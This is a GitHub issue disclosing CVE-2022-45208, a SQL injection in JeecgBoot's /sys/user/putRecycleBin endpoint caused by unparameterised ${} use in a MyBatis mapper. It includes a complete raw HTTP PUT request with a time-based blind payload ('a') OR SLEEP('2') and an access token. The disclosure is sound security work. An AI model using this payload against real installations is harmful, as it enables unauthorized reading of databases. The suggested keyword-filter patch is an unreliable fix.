Skip to content

[CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection #4126

Closed
@azraelxuemo

Description

@azraelxuemo

sysUserMapper.xml

revertLogicDeleted. You can see that no precompiling is performed
截屏2022-10-25 11 40 04

SysUserController.java

截屏2022-10-25 11 40 32

SysUserServiceImpl.java

截屏2022-10-25 11 41 42

So Users can pass in malicious parameters through http requests to achieve SQL injection

poc

The website will return immediately when the following content is passed in
截屏2022-10-25 11 43 33
After the following content is passed in, the website will return after a delay of 2 seconds
截屏2022-10-25 11 43 57

vuln

attack can user this to get data from database

payload:

PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

{
"userIds": "a') OR SLEEP('2"
}

patch

In (${})
It seems that this cannot be modified to precompile
So it is recommended to add some keywords such as')

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions